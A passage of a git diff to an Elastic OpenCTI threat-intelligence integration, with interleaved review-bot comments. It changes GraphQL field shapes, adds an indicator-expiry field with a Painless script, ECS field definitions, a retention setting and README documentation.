+ { + "value": "apt10" + }, + { + "value": "gh0st" + }, + { + "value": "t5000" + }, + { + "value": "dnscalc" + }, + { + "value": "conimes" + }, + { + "value": "apt20" + }, + { + "value": "california roll" + }, + { + "value": "shadowserver" + }, + { + "value": "terminator" + }, + { + "value": "emdivi" + }, + { + "value": "linopid" + }, + { + "value": "hothot" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -191,4 +131,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json-expected.json index d85e82d127a..4af29337afb 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2017-10-22T14:00:51.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json index e7e699eba83..da7377ae284 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json 
@@ -23,28 +23,18 @@ "identity_class": "organization", "name": "CIRCL" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "malware" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "malware" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -56,4 +46,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json-expected.json index 5eb0ea2b1bc..c3baa566221 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-user-agent.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": true, + "invalid_or_revoked_from": "2017-04-26T10:57:51.000Z", "is_inferred": false, "lang": "en", "observables_count": 0, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json index 94dbd5acf82..1d890006642 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json 
@@ -23,28 +23,18 @@
 "identity_class": "organization",
 "name": "CIRCL"
 },
- "objectMarking": {
- "edges": [
- {
- "node": {
- "definition_type": "TLP",
- "definition": "TLP:CLEAR"
- }
- }
- ]
- },
- "objectLabel": {
- "edges": [
- {
- "node": {
- "value": "technical-report"
- }
- }
- ]
- },
- "killChainPhases": {
- "edges": []
- },
+ "objectMarking": [
+ {
+ "definition_type": "TLP",
+ "definition": "TLP:CLEAR"
+ }
+ ],
+ "objectLabel": [
+ {
+ "value": "technical-report"
+ }
+ ],
+ "killChainPhases": [],
 "externalReferences": {
 "edges": []
 },
@@ -68,4 +58,4 @@
 }
 }
 ]
-}
\ No newline at end of file
+}
diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json-expected.json
index 6cf37f89b56..f298cc45139 100644
--- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json-expected.json
+++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-windows-registry-key.json-expected.json
@@ -19,6 +19,7 @@
 "indicator": {
 "creator_identity_class": "organization",
 "detection": false,
+ "invalid_or_revoked_from": "2017-10-25T14:13:17.000Z",
 "is_inferred": false,
 "lang": "en",
 "observables_count": 1,
diff --git a/packages/ti_opencti/data_stream/indicator/agent/stream/cel.yml.hbs b/packages/ti_opencti/data_stream/indicator/agent/stream/cel.yml.hbs
index 4a31db95433..8ba626e1770 100644
--- a/packages/ti_opencti/data_stream/indicator/agent/stream/cel.yml.hbs
+++ b/packages/ti_opencti/data_stream/indicator/agent/stream/cel.yml.hbs
@@ -140,27 +140,15 @@ state:
 name
 }
 objectMarking {
- edges {
- node {
- definition_type
- definition
- }
- }
+ definition_type
+ definition
 }
 objectLabel {
- edges {
- node {
- value
- }
- }
+ value
 }
 killChainPhases {
- edges {
- node {
- phase_name
- kill_chain_name
- }
- }
+ phase_name
+ kill_chain_name
 }
 externalReferences(first: 100) {
 edges {
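Review bot: The flattened `objectMarking`, `objectLabel` and `killChainPhases` selections in the cel.yml.hbs hunk make the query valid only against an OpenCTI GraphQL schema that exposes these as plain lists; a server still returning the older `edges { node { … } }` connection shape will reject the whole query at validation, which stops indicator collection entirely rather than degrading one field. Unless the minimum OpenCTI version is already stated elsewhere in the package, a note in the README and manifest such as `Requires OpenCTI <MIN_VERSION> or later (flattened objectMarking/objectLabel/killChainPhases GraphQL fields)` would let operators tell an upgrade-required failure from a connectivity one. Which OpenCTI release introduced the flattened schema is not visible in this diff, so the exact version needs confirming.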
diff --git a/packages/ti_opencti/data_stream/indicator/elasticsearch/ingest_pipeline/default.yml b/packages/ti_opencti/data_stream/indicator/elasticsearch/ingest_pipeline/default.yml
index e7503a39389..a406a1f3049 100644
--- a/packages/ti_opencti/data_stream/indicator/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/ti_opencti/data_stream/indicator/elasticsearch/ingest_pipeline/default.yml
@@ -126,6 +126,16 @@ processors:
 - rename:
 field: valid_until
 target_field: opencti.indicator.valid_until
+ - script:
+ lang: painless
+ source: |
+ if (ctx.opencti.indicator.revoked == true &&
+ ctx.threat.indicator.modified_at.compareTo(ctx.opencti.indicator.valid_until) < 0) {
+ ctx.opencti.indicator.invalid_or_revoked_from = ctx.threat.indicator.modified_at;
+ } else {
+ // valid_until always has a value, will be epoch + 10^14 ms if no other value
+ ctx.opencti.indicator.invalid_or_revoked_from = ctx.opencti.indicator.valid_until;
+ }
 - rename:
 field: x_opencti_score
 target_field: opencti.indicator.score
@@ -155,10 +165,10 @@ processors:
 - gsub:
 if: |
- ctx.objectMarking.edges != null &&
- !ctx.objectMarking.edges.isEmpty() &&
- ctx.objectMarking.edges[0].node.definition_type == "TLP"
- field: objectMarking.edges.0.node.definition
+ ctx.objectMarking != null &&
+ !ctx.objectMarking.isEmpty() &&
+ ctx.objectMarking[0].definition_type == "TLP"
+ field: objectMarking.0.definition
 pattern: '^TLP:'
 replacement: ''
 target_field: threat.indicator.marking.tlp
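Review bot: The added Painless script dereferences `ctx.opencti.indicator.revoked`, `ctx.threat.indicator.modified_at` and `ctx.opencti.indicator.valid_until` without null checks, so a document that lacks `modified_at` (the comment only guarantees `valid_until`) fails the whole pipeline with a NullPointerException instead of being indexed without the new field. A guard on the processor, `if: ctx.threat?.indicator?.modified_at != null && ctx.opencti?.indicator?.valid_until != null`, keeps it best-effort, and a `tag: set-invalid-or-revoked-from` makes a failure attributable in `on_failure` output. `compareTo` here is a string comparison, which orders chronologically only while both timestamps share the same fixed ISO-8601 layout (the fixtures show millisecond precision with a `Z` suffix for both); if either value is ever emitted with a different precision or offset, parsing both with `ZonedDateTime.parse` before comparing would be safer. The rename processors that supply these fields are outside this hunk, so whether `modified_at` can actually be absent is inferred rather than visible here.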
@@ -166,23 +176,23 @@ processors:
 field: objectMarking
 - foreach:
- field: objectLabel.edges
+ field: objectLabel
 ignore_missing: true
 processor:
 append:
 field: tags
- value: "{{{_ingest._value.node.value}}}"
+ value: "{{{_ingest._value.value}}}"
 allow_duplicates: false
 - remove:
 field: objectLabel
 - foreach:
- field: killChainPhases.edges
+ field: killChainPhases
 ignore_missing: true
 processor:
 append:
 field: opencti.indicator.kill_chain_phase
- value: "[{{{_ingest._value.node.kill_chain_name}}}] {{{_ingest._value.node.phase_name}}}"
+ value: "[{{{_ingest._value.kill_chain_name}}}] {{{_ingest._value.phase_name}}}"
 - remove:
 field: killChainPhases
diff --git a/packages/ti_opencti/data_stream/indicator/fields/ecs.yml b/packages/ti_opencti/data_stream/indicator/fields/ecs.yml
index 768e327c45e..8e6f9b7386d 100644
--- a/packages/ti_opencti/data_stream/indicator/fields/ecs.yml
+++ b/packages/ti_opencti/data_stream/indicator/fields/ecs.yml
@@ -14,3 +14,162 @@ - name: threat.indicator.file.hash.sha3_512 type: keyword description: SHA3-512 hash. +# External ECS defintions, required by the transform +- external: ecs + name: ecs.version +- external: ecs + name: event.agent_id_status +- external: ecs + name: event.category +- external: ecs + name: event.created +- external: ecs + name: event.dataset +- external: ecs + name: event.id +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.type +- external: ecs + name: related.hash +- external: ecs + name: related.hosts +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: tags +- external: ecs + name: threat.feed.dashboard_id +- external: ecs + name: threat.feed.description +- external: ecs + name: threat.feed.name +- external: ecs + name: threat.feed.reference +- external: ecs + name: threat.indicator.as.number +- external: ecs + name: threat.indicator.as.organization.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.email.address +- external: ecs + name: threat.indicator.file.accessed +- external: ecs + name: threat.indicator.file.created +- external: ecs + name: threat.indicator.file.directory +- external: ecs + name: threat.indicator.file.drive_letter +- external: ecs + name: threat.indicator.file.extension +- external: ecs + name: threat.indicator.file.hash.md5 +- external: ecs + name: threat.indicator.file.hash.sha1 +- external: ecs + name: threat.indicator.file.hash.sha256 +- external: ecs + name: threat.indicator.file.hash.sha384 +- external: ecs + name: threat.indicator.file.hash.sha512 +- external: ecs + name: threat.indicator.file.hash.ssdeep +- external: ecs + name: threat.indicator.file.hash.tlsh +- external: ecs + name: threat.indicator.file.mime_type +- external: ecs + name: threat.indicator.file.mtime +- 
external: ecs + name: threat.indicator.file.name +- external: ecs + name: threat.indicator.file.path +- external: ecs + name: threat.indicator.file.size +- external: ecs + name: threat.indicator.file.type +- external: ecs + name: threat.indicator.ip +- external: ecs + name: threat.indicator.marking.tlp +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.port +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.reference +- external: ecs + name: threat.indicator.registry.data.bytes +- external: ecs + name: threat.indicator.registry.data.strings +- external: ecs + name: threat.indicator.registry.data.type +- external: ecs + name: threat.indicator.registry.hive +- external: ecs + name: threat.indicator.registry.key +- external: ecs + name: threat.indicator.registry.path +- external: ecs + name: threat.indicator.registry.value +- external: ecs + name: threat.indicator.url.domain +- external: ecs + name: threat.indicator.url.extension +- external: ecs + name: threat.indicator.url.fragment +- external: ecs + name: threat.indicator.url.full +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.url.password +- external: ecs + name: threat.indicator.url.path +- external: ecs + name: threat.indicator.url.port +- external: ecs + name: threat.indicator.url.query +- external: ecs + name: threat.indicator.url.registered_domain +- external: ecs + name: threat.indicator.url.scheme +- external: ecs + name: threat.indicator.url.subdomain +- external: ecs + name: threat.indicator.url.top_level_domain +- external: ecs + name: threat.indicator.url.username +- external: ecs + name: threat.indicator.x509.alternative_names +- external: ecs + name: threat.indicator.x509.issuer.common_name +- external: ecs + name: threat.indicator.x509.not_after +- external: ecs + name: threat.indicator.x509.not_before +- external: ecs + name: 
threat.indicator.x509.public_key_algorithm +- external: ecs + name: threat.indicator.x509.public_key_exponent +- external: ecs + name: threat.indicator.x509.serial_number +- external: ecs + name: threat.indicator.x509.signature_algorithm +- external: ecs + name: threat.indicator.x509.subject.common_name +- external: ecs + name: threat.indicator.x509.version_number diff --git a/packages/ti_opencti/data_stream/indicator/fields/ioc-transform-source.yml b/packages/ti_opencti/data_stream/indicator/fields/ioc-transform-source.yml new file mode 100644 index 00000000000..8ce0fb6caaf --- /dev/null +++ b/packages/ti_opencti/data_stream/indicator/fields/ioc-transform-source.yml @@ -0,0 +1,4 @@ +- name: labels.is_ioc_transform_source + type: constant_keyword + value: "true" + description: Field indicating if the document is a source for the transform. This field is not added to destination indices to facilitate easier filtering of indicators for indicator match rules. diff --git a/packages/ti_opencti/data_stream/indicator/fields/opencti.yml b/packages/ti_opencti/data_stream/indicator/fields/opencti.yml index d799ff43646..2b4f5d0ff2f 100644 --- a/packages/ti_opencti/data_stream/indicator/fields/opencti.yml +++ b/packages/ti_opencti/data_stream/indicator/fields/opencti.yml @@ -33,6 +33,9 @@ - name: valid_until type: date description: The time at which this indicator should no longer be considered a valid indicator of the behaviors it is related to or represents. + - name: invalid_or_revoked_from + type: date + description: A time from which this indicator should be considered invalid or revoked. - name: score type: long description: An integer score for the indicator. diff --git a/packages/ti_opencti/data_stream/indicator/lifecycle.yml b/packages/ti_opencti/data_stream/indicator/lifecycle.yml new file mode 100644 index 00000000000..5a4af9095b7 --- /dev/null +++ b/packages/ti_opencti/data_stream/indicator/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "5d" 
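Review bot: The header comment introduced in this hunk, `# External ECS defintions, required by the transform`, misspells "definitions"; the same comment is copied verbatim into `elasticsearch/transform/latest_ioc/fields/ecs.yml` later in this diff, so both should read `# External ECS definitions, required by the transform`. It would also help a maintainer to say why the transform needs these entries — presumably because the destination index mappings are generated from the field files — but that reasoning is inferred, not visible here.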
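Review bot: `data_retention: "5d"` is introduced with no comment on why five days is sufficient, and the README text in this same diff describes it as an index lifecycle management (ILM) policy; as far as I recall, `lifecycle.yml` under a data stream configures data stream lifecycle rather than ILM, so the two descriptions should be reconciled. A short comment here would let operators judge the trade-off, e.g. `# Source documents only need to outlive the latest_ioc transform run; the durable view is logs-ti_opencti_latest.indicator`. Whether the transform runs often enough for a 5-day window cannot be checked from this hunk.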
diff --git a/packages/ti_opencti/docs/README.md b/packages/ti_opencti/docs/README.md index 691d0dc79db..cb978681844 100644 --- a/packages/ti_opencti/docs/README.md +++ b/packages/ti_opencti/docs/README.md @@ -15,7 +15,7 @@ Each event in the log data stream collected by the OpenCTI integration is an ind This integration requires Filebeat version 8.9.0, or later. -It was initially developed using OpenCTI version 5.10.1 and updated for verison 5.12.X. +It has been updated for OpenCTI version 5.12.24 and requires that version or later. ## Setup 
@@ -33,6 +33,18 @@ The `indicator` data stream includes indicators of the following types (`threat. OpenCTI's data model closely follows the [STIX standard](https://docs.oasis-open.org/cti/stix/v2.1/os/stix-v2.1-os.html). It supports complex indicators defined using STIX patterns or other languages, and each indicator can be related to one or more observables. In the [ECS threat fields](https://www.elastic.co/guide/en/ecs/current/ecs-threat.html) the focus is on atomic indicators. This integration fetches as much data as possible about indicators and their related observables, and populates relevant ECS fields wherever possible. It uses related observables rather than the indicator pattern as the data source for type-specific indicator fields. +#### Expiration of inactive indicators + +The `opencti.indicator.invalid_or_revoked_from` field is set to the earliest time at which an indicator reaches its `valid_until` time or is marked as revoked. From that time the indicator should no longer be considered active. + +An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created to provide a view of active indicators for end users. This transform creates destination indices that are accessible via the alias `logs-ti_opencti_latest.indicator`. When querying for active indicators or setting up indicator match rules, use that alias to avoid false positives from expired indicators. + +The dashboards show only active indicators, except the Ingestion dashboard, which shows data from both the source data stream and the indices of the latest indicators. + +Indicators that are never expired or revoked will not be removed from the indices of the latest indicators. If accumulation of indicators is a problem there, it can be managed upstream in OpenCTI, or by manually deleting indicators from those indices. 
+ +To prevent unbounded growth of the source data stream `logs-ti_opencti.indicator-*`, it has an index lifecycle management (ILM) policy that deletes records 5 days after ingestion. + #### Example Here is an example `indicator` event: @@ -164,6 +176,7 @@ Timestamps are mapped as follows: | modified | threat.indicator.modified_at | Time of the indicator's last modification | | valid_from | opencti.indicator.valid_from | Time from which this indicator is considered a valid indicator of the behaviors it is related to or represents | | valid_until | opencti.indicator.valid_until | Time at which this indicator should no longer be considered a valid indicator of the behaviors it is related to or represents | +| - | opencti.indicator.invalid_or_revoked_from | The earliest time at which an indicator reaches its `valid_until` time or is marked as revoked | The table below lists all `opencti.*` fields. 
@@ -180,13 +193,25 @@ The documentation for ECS fields can be found at: | data_stream.dataset | Data stream dataset. | constant_keyword | | data_stream.namespace | Data stream namespace. | constant_keyword | | data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| event.agent_id_status | Agents are normally responsible for populating the `agent.id` field value. If the system receiving events is capable of validating the value based on authentication information for the client then this field can be used to reflect the outcome of that validation. For example if the agent's connection is authenticated with mTLS and the client cert contains the ID of the agent to which the cert was issued then the `agent.id` value in events can be checked against the certificate. If the values match then `event.agent_id_status: verified` is added to the event, otherwise one of the other allowed values should be used. If no validation is performed then the field should be omitted. The allowed values are: `verified` - The `agent.id` field value matches expected value obtained from auth metadata. `mismatch` - The `agent.id` field value does not match the expected value obtained from auth metadata. `missing` - There was no `agent.id` field in the event to validate. `auth_metadata_missing` - There was no auth metadata or it was missing information about the agent ID. | keyword | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. 
This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Name of the dataset. If an event source publishes more than one type of log or events (e.g. access log, error log), the dataset is used to specify which one the event comes from. It's recommended but not required to start the dataset name with the module name, followed by a dot, then the dataset name. | keyword | +| event.id | Unique ID to describe the event. | keyword | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. 
For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | | input.type | Input type. | keyword | +| labels.is_ioc_transform_source | Field indicating if the document is a source for the transform. This field is not added to destination indices to facilitate easier filtering of indicators for indicator match rules. | constant_keyword | | opencti.indicator.creator_identity_class | The type of the creator of this indicator (e.g. "organization"). | keyword | | opencti.indicator.detection | Whether the indicator has been detected. | boolean | | opencti.indicator.external_reference.description | A description for a related record in an external system. | keyword | | opencti.indicator.external_reference.external_id | A non-STIX ID for a related record in an external system. 
| keyword | | opencti.indicator.external_reference.source_name | The name of an external source of related records. | keyword | | opencti.indicator.external_reference.url | A URL for a related record in an external system. | keyword | +| opencti.indicator.invalid_or_revoked_from | A time from which this indicator should be considered invalid or revoked. | date | | opencti.indicator.is_inferred | Whether the indicator is inferred. | boolean | | opencti.indicator.kill_chain_phase | The kill chain name and kill change phase name (e.g. "[mitre-attack] exfiltration"). | keyword | | opencti.indicator.lang | A language associated with the indicator record. | keyword | 
@@ -495,8 +520,81 @@ The documentation for ECS fields can be found at: | opencti.observable.x509_certificate.validity_not_before | The date on which the certificate validity period begins. | date | | opencti.observable.x509_certificate.value | The main value for the observable. | keyword | | opencti.observable.x509_certificate.version | The version of the encoded certificate. | keyword | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | +| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword | +| related.ip | All of the IPs seen on your event. | ip | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.dashboard_id | The saved object ID of the dashboard belonging to the threat feed for displaying dashboard links to threat feeds in Kibana. | keyword | +| threat.feed.description | Description of the threat feed in a UI friendly format. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. | keyword | +| threat.feed.reference | Reference information for the threat feed in a UI friendly format. | keyword | +| threat.indicator.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| threat.indicator.as.organization.name | Organization name. | keyword | +| threat.indicator.as.organization.name.text | Multi-field of `threat.indicator.as.organization.name`. 
| match_only_text | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. | keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. | keyword | +| threat.indicator.email.address | Identifies a threat indicator as an email address (irrespective of direction). | keyword | +| threat.indicator.file.accessed | Last time the file was accessed. Note that not all filesystems keep track of access time. | date | +| threat.indicator.file.created | File creation time. Note that not all filesystems store the creation time. | date | +| threat.indicator.file.directory | Directory where the file is located. It should include the drive letter, when appropriate. | keyword | +| threat.indicator.file.drive_letter | Drive letter where the file is located. This field is only relevant on Windows. The value should be uppercase, and not include the colon. | keyword | +| threat.indicator.file.extension | File extension, excluding the leading dot. Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword | +| threat.indicator.file.hash.md5 | MD5 hash. | keyword | +| threat.indicator.file.hash.sha1 | SHA1 hash. | keyword | +| threat.indicator.file.hash.sha256 | SHA256 hash. | keyword | +| threat.indicator.file.hash.sha384 | SHA384 hash. | keyword | | threat.indicator.file.hash.sha3_256 | SHA3-256 hash. | keyword | | threat.indicator.file.hash.sha3_512 | SHA3-512 hash. | keyword | +| threat.indicator.file.hash.sha512 | SHA512 hash. | keyword | +| threat.indicator.file.hash.ssdeep | SSDEEP hash. | keyword | +| threat.indicator.file.hash.tlsh | TLSH hash. 
| keyword | +| threat.indicator.file.mime_type | MIME type should identify the format of the file or stream of bytes using https://www.iana.org/assignments/media-types/media-types.xhtml[IANA official types], where possible. When more than one type is applicable, the most specific type should be used. | keyword | +| threat.indicator.file.mtime | Last time the file content was modified. | date | +| threat.indicator.file.name | Name of the file including the extension, without the directory. | keyword | +| threat.indicator.file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword | +| threat.indicator.file.path.text | Multi-field of `threat.indicator.file.path`. | match_only_text | +| threat.indicator.file.size | File size in bytes. Only relevant when `file.type` is "file". | long | +| threat.indicator.file.type | File type (file, dir, or symlink). | keyword | +| threat.indicator.ip | Identifies a threat indicator as an IP address (irrespective of direction). | ip | +| threat.indicator.marking.tlp | Traffic Light Protocol sharing markings. | keyword | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. | date | | threat.indicator.name | The display name indicator in an UI friendly format | keyword | +| threat.indicator.port | Identifies a threat indicator as a port number (irrespective of direction). | long | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.reference | Reference URL linking to additional information about this indicator. | keyword | +| threat.indicator.registry.data.bytes | Original bytes written with base64 encoding. For Windows registry operations, such as SetValueEx and RegQueryValueEx, this corresponds to the data pointed by `lp_data`. This is optional but provides better recoverability and should be populated for REG_BINARY encoded values. 
| keyword | +| threat.indicator.registry.data.strings | Content when writing string types. Populated as an array when writing string data to the registry. For single string registry types (REG_SZ, REG_EXPAND_SZ), this should be an array with one string. For sequences of string with REG_MULTI_SZ, this array will be variable length. For numeric data, such as REG_DWORD and REG_QWORD, this should be populated with the decimal representation (e.g `"1"`). | wildcard | +| threat.indicator.registry.data.type | Standard registry type for encoding contents | keyword | +| threat.indicator.registry.hive | Abbreviated name for the hive. | keyword | +| threat.indicator.registry.key | Hive-relative path of keys. | keyword | +| threat.indicator.registry.path | Full path, including hive, key and value | keyword | +| threat.indicator.registry.value | Name of the value written. | keyword | | threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.1 or OpenCTI | keyword | +| threat.indicator.url.domain | Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. | keyword | +| threat.indicator.url.extension | The field contains the file extension from the original request url, excluding the leading dot. The file extension is only set if it exists, as not every url has a file extension. The leading period must not be included. For example, the value must be "png", not ".png". Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword | +| threat.indicator.url.fragment | Portion of the url after the `#`, such as "top". The `#` is not part of the fragment. 
| keyword | +| threat.indicator.url.full | If full URLs are important to your use case, they should be stored in `url.full`, whether this field is reconstructed or present in the event source. | wildcard | +| threat.indicator.url.full.text | Multi-field of `threat.indicator.url.full`. | match_only_text | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. | match_only_text | +| threat.indicator.url.password | Password of the request. | keyword | +| threat.indicator.url.path | Path of the request, such as "/search". | wildcard | +| threat.indicator.url.port | Port of the request, such as 443. | long | +| threat.indicator.url.query | The query field describes the query string of the request, such as "q=elasticsearch". The `?` is excluded from the query string. If a URL contains no `?`, there is no query field. If there is a `?` but no query, the query field exists with an empty string. The `exists` query can be used to differentiate between the two cases. | keyword | +| threat.indicator.url.registered_domain | The highest registered url domain, stripped of the subdomain. For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". | keyword | +| threat.indicator.url.scheme | Scheme of the request, such as "https". Note: The `:` is not part of the scheme. 
| keyword | +| threat.indicator.url.subdomain | The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. | keyword | +| threat.indicator.url.top_level_domain | The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". | keyword | +| threat.indicator.url.username | Username of the request. | keyword | +| threat.indicator.x509.alternative_names | List of subject alternative names (SAN). Name types vary by certificate authority and certificate type but commonly contain IP addresses, DNS names (and wildcards), and email addresses. | keyword | +| threat.indicator.x509.issuer.common_name | List of common name (CN) of issuing certificate authority. | keyword | +| threat.indicator.x509.not_after | Time at which the certificate is no longer considered valid. | date | +| threat.indicator.x509.not_before | Time at which the certificate is first considered valid. | date | +| threat.indicator.x509.public_key_algorithm | Algorithm used to generate the public key. | keyword | +| threat.indicator.x509.public_key_exponent | Exponent used to derive the public key. This is algorithm specific. 
| long | +| threat.indicator.x509.serial_number | Unique serial number issued by the certificate authority. For consistency, if this value is alphanumeric, it should be formatted without colons and uppercase characters. | keyword | +| threat.indicator.x509.signature_algorithm | Identifier for certificate signature algorithm. We recommend using names found in Go Lang Crypto library. See https://github.com/golang/go/blob/go1.14/src/crypto/x509/x509.go#L337-L353. | keyword | +| threat.indicator.x509.subject.common_name | List of common names (CN) of subject. | keyword | +| threat.indicator.x509.version_number | Version of x509 format. | keyword | diff --git a/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/base-fields.yml b/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/base-fields.yml new file mode 100644 index 00000000000..450cb87a23a --- /dev/null +++ b/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/base-fields.yml @@ -0,0 +1,16 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. + value: logs +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: input.type + type: keyword + description: Input type. +- name: '@timestamp' + type: date + description: Time the event was received by the pipeline. diff --git a/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/ecs.yml b/packages/ti_opencti/elasticsearch/transform/latest_ioc/fields/ecs.yml new file mode 100644 index 00000000000..8e6f9b7386d --- /dev/null +++ 